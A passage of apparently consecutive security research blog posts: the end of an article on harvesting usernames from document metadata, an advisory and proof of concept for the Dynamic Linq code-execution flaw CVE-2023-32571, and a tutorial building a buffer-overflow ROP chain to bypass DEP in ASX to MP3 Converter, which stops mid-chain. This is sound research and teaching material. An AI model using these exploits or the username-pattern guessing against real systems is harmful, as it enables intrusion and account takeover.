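    print(usernames_from_text(sample))
```

In practice the results would still need filtering for built-in profile folders that are not real accounts.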

Extracting embedded documents and media

Office documents can include media as well as other embedded documents which can be additional sources of metadata. MetadataPlus has -m and -e options which will extract these files for further analysis. While some image files may come from external sources, or be stripped of metadata, some may be included locally without processing and could include additional data when examined with a tool such as exiftool. Embedded documents may contain additional information that can be analysed with MetadataPlus by moving the exe into the Embed folder and running again, and in the test case elaborated on below, an additional 5 names were extracted from embedded documents within the original documents.

Results Output and Analysis

Where possible MetadataPlus is designed to display data in a way that is useful and may aid in further discoveries. The tool prints a number of outputs at the end, including output from documents that contain both names and usernames as well as the tags these were pulled from – although for ease of use in other tools, MetadataPlus also prints a raw list of usernames, names, and email addresses. In the following example, a name is often pulled from the same document as a username:

At first, the usernames appear to be random letters and numbers. However, the name is often taken from whoever last modified the file, so it stands to reason that the username taken from the filepath belongs to that person. Thanks to linking the names and usernames in the output, it becomes apparent that there is a pattern: first three letters of the surname + first three letters of the first name + three numbers. The three numbers would take further investigation (they could be a building or department tag for example, or they may actually be random). This could be useful in social engineering as well, as something like calling for a password reset without knowing the name that goes with a username, or vice versa, would be likely to end in failure.
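Once a pattern like this has been spotted, it is easy to check candidate name/username pairs against it. The following Python sketch encodes the format described above; the person's name used in the demonstration is made up purely to illustrate how a username such as rodmig358 could arise.

```python
import re


def expected_prefix(first_name, surname):
    """First three letters of the surname, then of the first name."""
    return (surname[:3] + first_name[:3]).lower()


def matches_observed_format(username, first_name, surname):
    """True if username is the expected prefix followed by three digits."""
    pattern = re.escape(expected_prefix(first_name, surname)) + r"\d{3}"
    return re.fullmatch(pattern, username.lower()) is not None


if __name__ == "__main__":
    # "Miguel Rodriguez" is a hypothetical name, not taken from any document.
    print(expected_prefix("Miguel", "Rodriguez"))
    print(matches_observed_format("rodmig358", "Miguel", "Rodriguez"))
```

The same prefix function could be used in the other direction, to generate candidate usernames from a list of known staff names, leaving only the three digits unknown.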

Closing Thoughts

As a final example, the following shows the list of unique usernames MetadataPlus was able to pull from 9 documents:

In contrast, FOCA only returned full names:

It should be noted that these documents were created specifically to highlight the difference: FOCA does not make it easy to distinguish between names and usernames in its output, which made it difficult to show a direct comparison between the tools. In the roughly 120 documents analysed from a public document test case for one organisation, MetadataPlus found an additional 18 usernames on top of the 13 discovered by FOCA.

https://github.com/nccgroup/MetadataPlus

Dynamic Linq Injection Remote Code Execution Vulnerability (CVE-2023-32571)

Product Details

Name: System.Linq.Dynamic.Core
Affected versions: 1.0.7.10 to 1.2.25
Fixed versions: >= 1.3.0
URL: https://www.dynamic-linq.net/

Vulnerability Summary

CVE: CVE-2023-32571
CWE: CWE-184: Incomplete List of Disallowed Inputs
CVSSv3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
CVSSv3.1 base score: 9.1

Overview

What is Dynamic Linq?

Dynamic Linq is an open source .NET library that allows developers to easily incorporate flexible data filtering into their applications and services. It parses user-supplied text input and compiles and executes a lambda.

The library has over 80m downloads from the NuGet package manager site, and is used in a number of large projects including frameworks such as AspNetBoilerPlate, meaning it forms part of many applications.

The vulnerability

Users can execute arbitrary code and commands where user input is passed to Dynamic Linq methods such as .Where(...), .All(...), .Any(...) and .OrderBy(...). The .OrderBy(...) method is commonly provided with unchecked user input by developers, which results in arbitrary code execution. The code/commands will be executed in the context of the process that utilises Dynamic Linq. This is expected to be a low-privileged user or service account. Where search functionality is exposed to anonymous users, for example, this may be exploitable pre-authentication.

Root Cause Analysis

Dynamic Linq is used to compile and execute predicates that are supplied in text form. The input will be compiled, subject to some restrictions intended to prevent arbitrary method execution. Per the documentation, these safety checks are:

  • Only allow-listed primitive types can be explicitly instantiated
  • The only methods that may be called are:
    • Methods on Accessible Types
    • Static methods in the Math and Convert namespaces
    • Methods from the IEnumerable and IQueryable interfaces

The Accessible Types are the Linq primitive types (string, datetime, GUID, various numerical types, object etc.) and the System.Math and System.Convert namespaces (see Dynamic Linq – Accessible Types).

Additionally, Dynamic Linq will permit its own aggregate methods to be called on objects that implement the IEnumerable and IQueryable interfaces. The aggregate methods include .Where(...), .Skip(...), .First() etc.

However, in 2016 a pull request titled “Add unit test and fix public methods access” was made and accepted. This was intended to allow access to public methods on classes retrieved via Linq queries. This functionality had been intentionally prohibited by the original design for security reasons.

The commit changed the existing test used to determine if a method was permitted to be called:

Pre-commit

case 1:
    MethodInfo method = (MethodInfo)mb;
    if (!IsPredefinedType(method.DeclaringType))
        throw ParseError(errorPos, Res.MethodsAreInaccessible, GetTypeName(method.DeclaringType));

Post-commit

case 1:
    MethodInfo method = (MethodInfo)mb;
    if (!IsPredefinedType(method.DeclaringType) && !(method.IsPublic && IsPredefinedType(method.ReturnType)))
        throw ParseError(errorPos, Res.MethodsAreInaccessible, GetTypeName(method.DeclaringType));

In the original code, methods were only callable on predefined types (the Accessible Types). The commit widened this test, to also allow public methods that returned an Accessible Type to be called. This permits numerous dangerous methods to be called, the most useful of which is the Invoke method.

Invoke is a generic method found on all Method types, so by necessity its return type is Object, which can later be cast to the appropriate type. As the Object type is an Accessible Type, the Invoke method can be called on any Method type, allowing any method to be called on any object (and also any static method).
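The effect of the widened test can be modelled in a few lines of Python. This is a toy model of the logic described above, not the library's code: the set of predefined types is heavily abbreviated, and the `Method` record and function names are hypothetical.

```python
from dataclasses import dataclass

# Abbreviated, illustrative stand-in for the Accessible Types.
PREDEFINED_TYPES = {"Object", "String", "Int32", "Math", "Convert"}


@dataclass
class Method:
    name: str
    declaring_type: str
    return_type: str
    is_public: bool = True


def rejected_pre_commit(method):
    """Original rule: only methods declared on predefined types may be called."""
    return method.declaring_type not in PREDEFINED_TYPES


def rejected_post_commit(method):
    """Widened rule: public methods returning a predefined type also pass."""
    return (method.declaring_type not in PREDEFINED_TYPES
            and not (method.is_public
                     and method.return_type in PREDEFINED_TYPES))


get_name = Method("GetName", "Assembly", "AssemblyName")
invoke = Method("Invoke", "MethodBase", "Object")

if __name__ == "__main__":
    for m in (get_name, invoke):
        print(m.name, rejected_pre_commit(m), rejected_post_commit(m))
```

In this model GetName is rejected under both rules because it returns a type that is not predefined, while Invoke is rejected under the original rule but accepted under the widened one because it is public and returns Object.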

Invoking Arbitrary Methods

As the Invoke method is public and is declared to return an Object, which is an Accessible Type, the vulnerable versions of the Dynamic Linq library allow any method to be invoked.

This can be used to execute arbitrary methods on any object as illustrated in this simple proof of concept:

  1. Create a new .Net console project:
$> mkdir dynamic-linq-poc
$> cd dynamic-linq-poc
$> dotnet new console
  2. Replace the contents of Program.cs:
using System;
using System.Linq;
using System.Linq.Dynamic.Core;
public class Program
{
  public static void Main()
  {
    var baseQuery = new int[] { 1, 2, 3, 4, 5 }.AsQueryable();
    string predicate = "\"\".GetType().Assembly.GetName().Name.ToString() != \"NCC Group\"";
    var result = baseQuery.OrderBy(predicate);
    foreach (var val in result)
    {
      Console.WriteLine(val);
    }
  }
}
  3. Add a reference to the Dynamic Linq library:
$> dotnet add package System.Linq.Dynamic.Core --version 1.2.25
  4. Run the program and note the error message – “Methods on type ‘Assembly’ are not accessible”.

As expected, it is not permitted to call the GetName method on an object of type Assembly as the Assembly type is not an Accessible Type.

  5. Edit the predicate string as follows:
using System;
using System.Linq;
using System.Linq.Dynamic.Core;
public class Program
{
  public static void Main()
  {
    var baseQuery = new int[] { 1, 2, 3, 4, 5 }.AsQueryable();
    // The predicate is split across lines with concatenation for readability.
    string predicate = "\"\".GetType().Assembly.DefinedTypes.Where(it.name == \"Assembly\").First()" +
      ".DeclaredMethods.Where(it.Name == \"GetName\").First().Invoke(\"\".GetType().Assembly, " +
      "new Object[] {} ).Name.ToString() != \"NCC Group\"";
    var result = baseQuery.OrderBy(predicate);
    foreach (var val in result)
    {
      Console.WriteLine(val);
    }
  }
}
  6. Run the program again, and note that the code executes successfully.

Whilst the two predicates are semantically identical, the first one is prohibited as expected, but the second one is permitted as it uses the Invoke method to call the GetName method on the Assembly type. This technique is proven to allow the execution of OS commands and loading of arbitrary assemblies.

Impact

As Dynamic Linq is a library, the exact impact depends on the use-case within dependent projects. A common pattern seen across many web application/API projects is to use Dynamic Linq for sorting and pagination – user input is passed to the OrderBy method of the IEnumerable interface. For example:

[HttpPost(Name = "SearchItems")]
public IEnumerable<Item> Post(SearchItemReq req)
{
    return db.Items.Where(i => i.Type == req.Type).OrderBy(req.Order).ToArray();
}

In the above example the .OrderBy(...) method takes a string input directly from the user-supplied request input. This is a relatively common pattern observed in many code bases.

Prior to the introduction of this vulnerability this was a safe practice, however the vulnerability means that it is possible to leverage this to obtain remote code execution. This functionality is often available pre-authentication.

The vulnerability is known to have affected numerous dependents, including the following, so its overall impact is expected to be significant:

  • Asp.Net Boilerplate (ABP) Framework
  • Microsoft Rules Engine
  • .Net Entity Framework
  • Various CMSes including Umbraco CMS

Patching

Update System.Linq.Dynamic.Core to version 1.3.0 or greater.

Don’t forget about your upstream dependencies! Integrating tools such as OWASP Dependency Check or Trivy into your CI/CD pipeline can help you detect vulnerable dependencies early so you don’t introduce vulnerabilities into your product.

Defeating Windows DEP With A Custom ROP Chain

Overview

This article explains how to write a custom ROP (Return Oriented Programming) chain to bypass Data Execution Prevention (DEP) on a Windows 10 system. DEP makes certain parts of memory (e.g., the stack) used by an application non-executable. This means that overwriting EIP with a “JMP ESP” (or similar) instruction and then freely executing shellcode on the stack will not be possible.

The main goal of using a ROP chain is to combine several ROP gadgets (assembly instructions stored at specific addresses within the DLL/EXE) together to bypass DEP and execute code on the stack. Each ROP gadget will end with a ret instruction, which will allow the next gadget address to be popped into EIP and continue executing that next gadget. Executing the ROP gadgets one after another will lead to executing the type of assembly code that will perform one of the following actions:

  • Build and execute shellcode (e.g., a reverse shell) using just the ROP gadgets.
  • Disable DEP and then jump to the shellcode address that is now allowed to be executed on the stack.

The first method would be very difficult to implement and will require a lot of ROP gadgets, and hence it is very common to create a ROP chain that will first disable DEP on the system and then execute the shellcode placed on the stack.

There are various Windows APIs that can help us disable or bypass DEP, but the three most common ones are VirtualAlloc, VirtualProtect and WriteProcessMemory. In this article we will be covering VirtualAlloc which allocates and changes the permissions of a specific memory region (e.g., the stack) of the running process (our application). So in our case we will use VirtualAlloc to make the stack executable, which in turn will allow the shellcode to be executed from the stack.

Automating the process of creating a complete ROP chain using the Mona Python plugin for Immunity Debugger is a well-known method of bypassing DEP. However, there is a possibility that Mona will fail to create a complete ROP chain and it will be up to the exploit developer to finalize it.

While it is possible to use Mona to create and finalize a ROP chain, we will take a completely different approach and write our ROP chain from scratch. The exploit developer will need to write each ROP gadget manually in order to create a complete ROP chain. While this method of bypassing DEP is harder to implement, it will provide a much deeper understanding on how to overcome the limitation of some automated tools and be comfortable at writing a custom ROP chain.

Setting Up Our Exploit Dev Environment

We will be using a Windows 10 64-bit VM for our exploit development. The vulnerable application can be downloaded from the following link: ASX to MP3 converter.

It is important to note that while the operating system is 64-bit, the actual application is 32-bit. This will be obvious once we start testing the application in a debugger and all the memory addresses used by the software will be 4 bytes long (DWORD, e.g., 0x12345678). Therefore, the ROP chain techniques that are explained in this article are specifically aimed at exploiting 32-bit applications where the arguments for an API call (e.g., VirtualAlloc) are placed on the stack.

Our exploit will be based on this proof-of-concept. The two CVEs (CVE-2017-15221, CVE-2009-1324) associated with the exploit do not provide the exact details about the type of vulnerable function used by the application. The advisory provides generic information about an overly large .m3u file that causes memory corruption via a stack-based buffer overflow.

We will be using WinDBG Preview (installed from Microsoft Store) to help us write a custom ROP chain.

We will also need to enable DEP for the application. Typing “advanced system settings” in the Start menu will open a new window. We will then need to select “Settings” in the Performance section and enable DEP for all programs as shown below. The system will then need to be restarted.

Selecting Our Target Module

We are specifically interested in the modules that don’t have ASLR/Rebase enabled to make the exploit stable across reboots. This is necessary because, otherwise, the ROP gadget addresses would change after each reboot of the system.

What’s important to note here is that in order to overcome ASLR we could either cause a memory leak (an advanced technique that is not covered here), take a brute-force approach by guessing the base address of the DLL (this is possible in 32-bit applications but unrealistic for 64-bit applications), or pick a module/DLL that doesn’t have ASLR/Rebase enabled at all. In this case we will take the last approach, which is simplest.

The exact way to identify which modules don’t have ASLR/Rebase enabled is not covered in this article. However, if the reader is interested they could install the Mona plugin for WinDBG or just use the “lm” command in WinDBG to identify which modules they could use.

Apart from the main application executable (ASX2MP3Converter.exe), we only have one DLL (MSA2Mfilter03.dll) that doesn’t have ASLR/Rebase enabled. We will use this DLL for our exploit development.

The reason why we can’t use the main executable is because its address range (0x00400000–0x00518000) contains null bytes. A null byte is a very common bad character that can terminate our exploit before it is fully executed, which is the case for the particular vulnerability we are exploiting.

We will need to keep in mind the following bad characters to avoid during our exploit development process:

00, 0a
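A quick way to see why the main executable is ruled out is to check each candidate address for bad characters once it has been packed into little-endian form. The helper below is a small sketch of that check; the function name is my own.

```python
from struct import pack

BAD_BYTES = b"\x00\x0a"  # the two bad characters listed above


def has_bad_bytes(address):
    """True if the packed little-endian DWORD contains a bad character."""
    return any(byte in BAD_BYTES for byte in pack("<L", address))


if __name__ == "__main__":
    # An address inside the main executable's range contains null bytes.
    print(hex(0x00400000), has_bad_bytes(0x00400000))
    # The gadget address used later in MSA2Mfilter03.dll does not.
    print(hex(0x10038f84), has_bad_bytes(0x10038f84))
```

The same check is worth running on every gadget address and every constant placed on the stack, since a single bad byte anywhere in the buffer truncates the payload.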

Please note that we will be using the following Python exploit as our starting point. We will not be covering the absolute basics of exploit development in this article (e.g., finding the offset to EIP and what bad characters to avoid). It is already assumed that the reader is familiar with that process. This tutorial is aimed at intermediate-level exploit developers that are already familiar with such basic tasks.

It is also important to note that the below PoC Python exploit needs to be executed to generate an .m3u file, which in turn needs to be dragged onto the application for it to load the file and crash. We will be updating our ROP chain throughout this article and generating a new .m3u file every time.

buffer = "http://"
buffer += "A"*17417
buffer += "BBBB" #EIP overwrite
buffer += "CCCC" #filler
buffer += "D"*(18000-len(buffer))
f=open("exploit.m3u", "w")
f.write(buffer)
f.close()

Writing a Custom ROP Chain

The custom ROP chain will be focused on using the specific ROP gadgets to dynamically prepare a call to VirtualAlloc in memory. The placeholder address of the API and its arguments will be patched on the stack with the actual values required to perform the call correctly. After the call to VirtualAlloc is made and DEP is bypassed, we will return to an address on the stack and execute our shellcode.

This technique is based on what I learned from OffSec’s OSED course. If you are interested in learning more about modern exploit development on Windows systems I highly recommend you check it out.

Step 1: Obtaining ROP Gadgets

We will use a tool called RP++ to help us obtain ROP gadgets from the specific DLL (MSA2Mfilter03.dll). We will also instruct the tool to exclude the gadget addresses with the bad characters in them, otherwise the gadget will terminate the ROP chain and prevent us from exploiting the application.

rp-win.exe -f "C:\Program Files (x86)\Mini-stream\ASX to MP3 Converter\MSA2Mfilter03.dll" -r 5 --bad-bytes \x0a\x00 > rop.txt

Reducing the number (5) of assembly instructions per gadget would decrease the number of gadgets the tool finds in the DLL, making it harder to find the right gadgets to create a complete ROP chain. Increasing the number would make it harder for us to overcome the junk assembly instructions inside gadgets that may affect our ROP chain and make them not execute correctly. That’s why setting the value to 5 is usually recommended. More information about overcoming irrelevant assembly instructions in ROP gadgets is explained further in the article.

Step 2: Configuring VirtualAlloc Placeholder Values

We will update our exploit code as follows:

from struct import pack
shellcode = "E" * 400 #we will replace this with the real shellcode in the end
VA_placeholder = pack("<L", (0x45454545))  # VirtualAlloc Address
VA_placeholder += pack("<L", (0x46464646)) # Shellcode Return Address
VA_placeholder += pack("<L", (0x47474747)) # lpAddress - Shellcode Address
VA_placeholder += pack("<L", (0x48484848)) # dwSize
VA_placeholder += pack("<L", (0x49494949)) # flAllocationType
VA_placeholder += pack("<L", (0x50505050)) # flProtect

rop_chain = pack("<L", (0x10038f84)) # push esp ; and al, 0x10 ; pop esi ; mov dword [edx], eax ; mov eax, 0x00000001 ; ret  ;
rop_chain += pack("<L", (0x42424242)) # filler
rop_chain += pack("<L", (0x43434343)) # next gadget

buffer = "http://"
buffer += "A" * (17417 - len(VA_placeholder))
buffer += VA_placeholder
buffer += rop_chain #EIP overwrite
buffer += "\x90" * 20 #nop sled
buffer += shellcode
buffer += "D"*(18000-len(buffer))

f=open("exploit.m3u", "w")
f.write(buffer)
f.close()

The above code contains our VirtualAlloc placeholder values in the first part of the buffer right before the EIP gets overwritten. Each argument for the API is explained later in this article, but more information about it can be found here.

LPVOID VirtualAlloc(
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);

Apart from the 4 arguments required for the API, our placeholder section also contains the return address (currently replaced with 0x46464646) right after the API call itself (currently replaced with 0x45454545). The return address is needed because once we get to the point of executing our patched VirtualAlloc API with its arguments, we will essentially be performing a simulated function call in memory. Each function must return somewhere after it’s done executing its code. In this case we will need to return to our shellcode. Since the API call will make the stack executable, it will allow us to safely return to it and start executing the shellcode on the stack.
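The exploit listing above concatenates text strings with packed values, which works under Python 2 but raises a TypeError under Python 3. As a sanity check of the layout, here is a Python 3 sketch that builds the same buffer using bytes throughout. The constants are taken from the listing; the function name and the decision to return the pieces rather than write the file are mine.

```python
from struct import pack

PREFIX = b"http://"
OFFSET_TO_EIP = 17417   # bytes between the prefix and the EIP overwrite
TOTAL_LENGTH = 18000


def build_buffer():
    """Return (buffer, placeholders) laid out as in the exploit listing."""
    placeholders = b"".join(pack("<L", value) for value in (
        0x45454545,  # VirtualAlloc address
        0x46464646,  # shellcode return address
        0x47474747,  # lpAddress
        0x48484848,  # dwSize
        0x49494949,  # flAllocationType
        0x50505050,  # flProtect
    ))
    rop_chain = b"".join(pack("<L", value) for value in (
        0x10038f84,  # first gadget, overwrites EIP
        0x42424242,  # filler
        0x43434343,  # next gadget (temporary)
    ))
    shellcode = b"E" * 400  # stand-in for the real shellcode
    buffer = PREFIX
    buffer += b"A" * (OFFSET_TO_EIP - len(placeholders))
    buffer += placeholders
    buffer += rop_chain
    buffer += b"\x90" * 20
    buffer += shellcode
    buffer += b"D" * (TOTAL_LENGTH - len(buffer))
    return buffer, placeholders


if __name__ == "__main__":
    buffer, placeholders = build_buffer()
    eip_offset = len(PREFIX) + OFFSET_TO_EIP
    print("placeholders start at", buffer.find(placeholders))
    print("EIP overwrite at", eip_offset, buffer[eip_offset:eip_offset + 4].hex())
```

Writing the result to disk would need the file opened in binary mode ("wb") rather than "w".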

Step 3: Our First ROP Gadget

You can see that the above exploit code already contains the first ROP gadget that will overwrite EIP.

rop_chain = pack("<L", (0x10038f84)) # push esp ; and al, 0x10 ; pop esi ; mov dword [edx], eax ; mov eax, 0x00000001 ; ret  ;

The idea behind the first ROP gadget is to make a general CPU register point to the placeholder address containing 0x45454545 on the stack, and then patch it with the real address of VirtualAlloc (located in kernel32.dll). In this case we will use ESI and a few other registers for that purpose.

In order for ESI to contain that address, we will first need to move the value that ESP is pointing to (the top of the stack) into ESI. We will then perform a few mathematical calculations with the help of other general CPU registers and make ESI point to the placeholder address 0x45454545. The reason why we can’t manipulate ESP instead of ESI is because ESP always needs to point to the top of the stack containing the next ROP gadget to execute. If we make ESP point to the placeholder address instead, there will be no other register pointing to the second ROP gadget on the stack and our ROP chain will break. Luckily, we have plenty of other general CPU registers we can use for that purpose and so we use ESI here.

The actual ROP gadget itself was found in the rop.txt file that the RP++ tool generated for us. I recommend you use a text editor that supports REGEX search functions to help you locate the right gadget quickly. For example, I used the following REGEX search string in Sublime:

(\<push esp\>.*\<pop esi\>)
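If you would rather script the search than use an editor, the same idea can be expressed in Python, where `\b` plays the role of the `\<` and `\>` word boundaries. The sketch below assumes each line of rop.txt holds one gadget in the form "address: instr ; instr ; ...", as in the gadget comments in the exploit code; the second and third sample lines are made-up addresses used only to show non-matches.

```python
import re

# "push esp" followed, later in the same gadget, by "pop esi".
GADGET_RE = re.compile(r"\bpush esp\b.*\bpop esi\b")


def find_gadgets(lines):
    """Return the gadget lines that move ESP into ESI via push/pop."""
    return [line.strip() for line in lines if GADGET_RE.search(line)]


if __name__ == "__main__":
    sample = [
        "0x10038f84: push esp ; and al, 0x10 ; pop esi ; "
        "mov dword [edx], eax ; mov eax, 0x00000001 ; ret  ;",
        "0x10011111: pop esi ; ret  ;",             # hypothetical
        "0x10022222: pop esi ; push esp ; ret  ;",  # hypothetical, wrong order
    ]
    for gadget in find_gadgets(sample):
        print(gadget)
```

With a real rop.txt, the list of lines would come from iterating over the open file.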

The assembly instructions in our first ROP gadget are separated by a semi-colon. We can see that after pushing ESP on the stack, we have the “and al, 0x10” instruction. This instruction is benign and will not affect the main purpose of this gadget, which is to move the value of ESP into ESI. The two other irrelevant assembly instructions (“mov dword [edx], eax” and “mov eax, 0x00000001”) will also not prevent our ROP chain from executing correctly. The best way to see this ROP gadget in action is to launch our exploit against the application and step through each instruction in WinDBG.

Once we attach WinDBG to the ASX2MP3Converter.exe process, we will place a breakpoint on the first ROP gadget and then continue running the process by pressing F5.

We then drag the .m3u file that we generated using our exploit onto the application and our breakpoint will be hit. Since we hijack the instruction pointer (EIP) in the application with our first ROP gadget, the next instruction to be executed will be “push esp”.

We can see that ESP is currently pointing to 0x43434343, which is the next temporary ROP gadget that we placed in our exploit.

It is also important to note that we had to place a 4-byte filler value (0x42424242) between the first ROP gadget (the one that overwrites EIP) and the second one (currently set to 0x43434343). This is because ESP points to the address on the stack at an offset of 4 (i.e. ESP + 4).

If we place our second ROP gadget right after the first one, ESP will jump over it and skip it entirely. That’s why we had to pad our ROP chain with the 4-byte filler between the first and second gadget. The following screenshot demonstrates that in more detail.

By typing “t” we execute the “push esp” instruction, which will move the value of ESP (0x0014c480) onto the stack.

Executing the next instruction by typing “t” performs the “AND” operation on AL (the 8-bit part of EAX) using the value 0x10, which in this case does not have any negative impact on our ROP chain.

We then pop the value from the stack into ESI using the “pop esi” instruction. So now ESI is pointing to the top of the stack, which was our goal in the first place.

The next “junk” instruction is “mov dword ptr [edx],eax”, which writes the value of EAX (currently set to 0 after the AND operation) to the address pointed to by EDX.

In this case we were lucky because when we get control over the application, EDX always points to a valid writable memory address, so the instruction “mov dword ptr [edx],eax” does not cause an exception.

The actual writable address is always the heap base address.

The next instruction moves 1 into EAX, which again does not matter in this case. We then return (using the “ret” instruction) into the next gadget that ESP is pointing to on the stack. Since we placed the value 0x43434343 as the next gadget, execution jumps to that invalid address and the process crashes.

Step 4: Making ESI Point To Our VirtualAlloc Placeholder

Now that we have ESI containing our stack address, we will need to subtract a value from it to make ESI point to our placeholder address containing 0x45454545. That placeholder address is positioned lower on the stack before EIP gets overwritten with our first ROP gadget.

EAX and ECX are the most convenient registers for the arithmetic here, because the DLL contains plenty of ROP gadgets operating on them that we can use to make ESI point to the address holding 0x45454545.

We will update our second dummy ROP gadget containing 0x43434343 with the following ROP gadgets. Just like the first gadget, these ones were found in the rop.txt file using Sublime’s search functionality.

rop_chain += pack("<L", (0x10022973)) # mov eax, esi ; pop esi ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into esi
rop_chain += pack("<L", (0x1003985f)) # pop ecx ; ret  ;
rop_chain += pack("<L", (0xffffffe0)) # -0x20
rop_chain += pack("<L", (0x1001465e)) # add eax, ecx ; ret  ;
rop_chain += pack("<L", (0x10040754)) # push eax ; pop esi ; pop ebp ; lea eax, dword [ecx+eax+0x0D] ; pop ebx ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into ebp
rop_chain += pack("<L", (0x42424242)) # junk value into ebx

These gadgets will make more sense once we start debugging them in WinDBG. We update our exploit with the additional ROP gadgets, set the breakpoint on the second gadget (0x10022973) and trigger the vulnerability.

The first instruction moves the value of ESI (now points to an address on the stack) into EAX.

We then pop the junk value 0x42424242 into ESI. We don’t really care about ESI right now because EAX already contains its value. We will move the correct value into ESI again after we have done our calculations with EAX and ECX. The “pop esi” instruction is an additional junk instruction that we have to deal with because no clean “mov eax, esi ; ret” gadget was found in the DLL.

Our next goal is to make EAX point to the address of the VirtualAlloc placeholder value (currently set to 0x45454545) lower on the stack. The difference between the current value of EAX and our target value is 0x20.

We cannot just subtract 0x20 from EAX because that would make the remaining 3 bytes in the 32-bit 0x00000020 DWORD value contain 0x00’s. The null byte is one of the bad characters we must avoid in our ROP chain.

An alternative method to subtracting a positive value from EAX is to add a negative value to it. The negative value of 0x20 is 0xffffffe0.

So the ROP gadgets in our exploit pop the negative value into ECX and then add ECX to EAX (“add eax, ecx”), which effectively subtracts 0x20 from EAX without using any null byte.
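The arithmetic behind this trick can be checked outside the debugger. The snippet below is only a sketch: the helper names neg32 and has_null_byte are made up for illustration, and the EAX value is an example stack address rather than the exact value EAX holds at this point in the chain.

```python
import struct

MASK32 = 0xFFFFFFFF  # keep results within a 32-bit register

def neg32(value):
    """Two's complement negation of value, truncated to 32 bits (hypothetical helper)."""
    return (-value) & MASK32

def has_null_byte(dword):
    """True if the little-endian packing of dword contains a 0x00 byte (hypothetical helper)."""
    return b"\x00" in struct.pack("<L", dword)

offset = 0x20
encoded = neg32(offset)             # the value popped into ECX
eax = 0x0014c480                    # illustrative stack address only
result = (eax + encoded) & MASK32   # models "add eax, ecx"

print(hex(encoded))                 # 0xffffffe0
print(has_null_byte(offset))        # True: 0x00000020 cannot be used directly
print(has_null_byte(encoded))       # False: 0xffffffe0 is safe to place in the chain
print(hex(result))                  # 0x14c460, i.e. eax - 0x20
```

The same check applies to the other offsets used later in the chain (0x54, 0x98, 0xdc and 0x114).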

The next step is to move that value into ESI again. The gadget we use pushes EAX onto the stack and then pops it into ESI. There are some additional junk instructions that do not have any impact on our ROP chain. We pop a junk value into EBP, the “lea” instruction then overwrites EAX with the computed value ECX + EAX + 0x0D (it only calculates an address and does not access memory), and finally we pop another junk value into EBX. ESI is now pointing to our placeholder address.

Step 5: Finding VirtualAlloc Address

Our next goal is to place the real address of VirtualAlloc from kernel32.dll in place of 0x45454545. Since Windows 10 has ASLR enabled for all OS DLLs and their functions, we cannot just hardcode the static address of VirtualAlloc into our placeholder address, because it will be different after the machine reboots.

We can instead find the address of VirtualAlloc in the Import Address Table (IAT) of the MSA2Mfilter03.dll module. Once we find that address, we can dereference it (i.e. obtain the first 4-byte DWORD value stored in that address), and the dereferenced value will be the actual address of VirtualAlloc inside kernel32.dll. Since the MSA2Mfilter03.dll module does not have ASLR enabled, the address inside the IAT will always be the same.

We copy the module from the directory (C:\Program Files (x86)\Mini-stream\ASX to MP3 Converter\MSA2Mfilter03.dll) to our host machine and open it in IDA Free. We select the “Imports” tab, right click on the main window and select “Quick filter”. We can type VirtualAlloc in the search field to find the IAT address of this API.

We update our exploit to contain the following additional ROP gadgets.

rop_chain += pack("<L", (0x1002a779)) # pop eax ; ret  ;
rop_chain += pack("<L", (0x1004F060)) # VirtualAlloc KERNEL32 IAT
rop_chain += pack("<L", (0x1004d304)) # mov eax, dword [eax] ; ret  ;
rop_chain += pack("<L", (0x10049875)) # mov dword [esi], eax ; pop esi ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into esi

We first pop the IAT address of VirtualAlloc into EAX, then dereference it so that EAX holds the real address of VirtualAlloc. We then write EAX to the address that ESI is pointing to, which holds the placeholder 0x45454545 at this time. The trailing “pop esi” in that gadget is a junk instruction, so we supply the value 0x42424242 for it to consume. Stepping through the gadgets in WinDBG confirms that, just before that pop, ESI points to the address on the stack that now stores the real VirtualAlloc address. We don’t care that ESI is overwritten afterwards, because the placeholder has already been updated with our VirtualAlloc address.

Step 6: Updating the return address placeholder

We need the call to VirtualAlloc to return into the memory address that had its memory permissions changed by the API. Since we are using our ROP chain to manually prepare the call to VirtualAlloc, we will also need to place a valid return address after the call. The placeholder values are shown below:

In this case we will need to replace the placeholder value of 0x46464646 with the return address on the stack. This is where we will execute our shellcode after we have made the stack executable using VirtualAlloc.

We will use the same ROP gadgets to make ESI point to that placeholder address. However, since we’ve already added quite a few ROP gadgets on the stack, we will need to subtract a bigger value (0x54) from EAX and then move that value into ESI.

rop_chain += pack("<L", (0x10038f84)) # push esp ; and al, 0x10 ; pop esi ; mov dword [edx], eax ; mov eax, 0x00000001 ; ret  ;
rop_chain += pack("<L", (0x10022973)) # mov eax, esi ; pop esi ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into esi
rop_chain += pack("<L", (0x1003985f)) # pop ecx ; ret  ;
rop_chain += pack("<L", (0xffffffac)) # -0x54
rop_chain += pack("<L", (0x1001465e)) # add eax, ecx ; ret  ;
rop_chain += pack("<L", (0x10040754)) # push eax ; pop esi ; pop ebp ; lea eax, dword [ecx+eax+0x0D] ; pop ebx ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into ebp
rop_chain += pack("<L", (0x42424242)) # junk value into ebx

After doing the usual testing with WinDBG, we now have ESI pointing to 0x46464646.

The next step is to locate the address on the stack where our shellcode is and then update the placeholder value with that address.

One method to get that address is to move the value of ESI into EAX and then subtract a negative value saved in ECX from EAX. A negative value stored in ECX that is subtracted from the value in EAX will essentially add that value to EAX.

I couldn’t find a clean gadget for that, so I had to first push the value of ESI on the stack and then pop it into EBX. I was then able to move EBX into EAX, working around a few junk instructions in the process.

The following ROP gadgets were added to the exploit. After EAX was made to point to the placeholder value of 0x46464646, a negative value (-0x180) was popped into ECX and was then “subtracted” from EAX, which in effect adds 0x180 to EAX.

rop_chain += pack("<L", (0x100122bb)) # push esi ; add al, 0x5E ; pop ebx ; ret  ;
rop_chain += pack("<L", (0x1001ce45)) # mov eax, ebx ; pop ebp ; pop ebx ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into ebp
rop_chain += pack("<L", (0x42424242)) # junk value into ebx
rop_chain += pack("<L", (0x1003985f)) # pop ecx ; ret  ;
rop_chain += pack("<L", (0xfffffe80)) # -0x180
rop_chain += pack("<L", (0x1002c9a4)) # sub eax, ecx ; ret  ;
